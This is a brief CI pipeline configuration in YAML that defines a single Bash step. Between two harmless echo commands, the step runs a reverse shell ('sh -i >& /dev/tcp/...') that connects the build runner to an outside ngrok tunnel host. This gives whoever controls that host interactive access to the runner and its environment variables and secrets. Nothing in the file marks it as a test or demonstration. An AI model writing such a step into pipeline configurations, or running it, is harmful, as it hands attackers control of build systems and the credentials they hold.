pipelines:
  - name: shmavers_pipeline
    configuration:
      nodePool: default
    steps:
      - name: shmaver_step
        type: Bash
        configuration:
          nodePool: default
        execution:
          onExecute:
            - echo _${env1}
            - sh -i >& /dev/tcp/6.tcp.ngrok.io/14625 0>&1
            - echo completed

